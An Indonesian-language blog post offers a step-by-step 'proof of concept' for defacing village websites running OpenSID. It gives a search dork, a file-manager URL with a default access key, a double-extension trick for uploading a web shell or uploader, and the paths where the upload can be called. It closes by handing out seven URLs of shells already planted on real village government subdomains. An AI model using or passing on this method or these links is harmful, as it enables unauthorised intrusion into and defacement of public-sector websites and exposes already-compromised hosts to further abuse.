Deface Poc OpenSID Desa

 


Oke kembali lagi sama w Mr.Dick ( Dicky Frandika ) kali we akan bagi materi seperti judulnya yekan pasti

Oke langsung aja bahan bahan yang harus di siapkan adalah dork yang dorknya mudah cuman kek gini

~> Dorknya : OpenSID kotamu / daerahlu

Oke bahan bahan siapkan :

1.hp/leptop/Pc

2.shell / sc depes serah lu

3. Kuota internet pastinya yekan 

Langsung aja lu ngedork ada yang go.id juga tapi yah gitu banyak yang sudah di patch aowkaoaka

Kalok misal mau up Shell siapkan Uploader nah uploaderlu harus yang Ext uploader.php<3.html nah kek gitu 

Nah sekarang langsung kalok udah ngedork lalu tempelkan Exploit, untuk Exploit nya hanya kek gini 

~>Exploitnya :/assets/filemanager/dialog.php?akey=GantiKunciDesa

Jadi cara tempelin Exploitnya

https//www.ngewe-dong.id/assets/filemanager/dialog.php?akey=GantiKunciDesa

Nah kek gitu jadi entar ada titik tiga lalu lu pencet lalu pilih logo upload nya lalu lu upload mau up sc / Uploader terserah elu

Untuk manggil sc/uploaderlu kek gini

/desa/upload/media/sclu.html <~ jika lu upload sc biasa jika lu upload Uploader kek gini

/desa/upload/media/uploader.php <~ jadi gak perlu di panggil dengan <3.html oke

Kalok udah tinggal upshell done 

Oke kali ini we bagi bagi akses juga cuman 8 dan ini cepet cepetan siapa cepat dia dapat aowkaowkaoka

http://penjor.sid.tulungagungdaring.id/oldshell.php
http://sukoharjo.sid.tulungagungdaring.id/info.php
http://kepuh.sid.tulungagungdaring.id/info.php
http://segawe.sid.tulungagungdaring.id/info.php
http://batangsaren.sid.tulungagungdaring.id/info.php
https://gondosuli.sid.tulungagungdaring.id/info.php
https://gondang.sid.tulungagungdaring.id/info.php


Terimakasih lurr




Anda mungkin menyukai postingan ini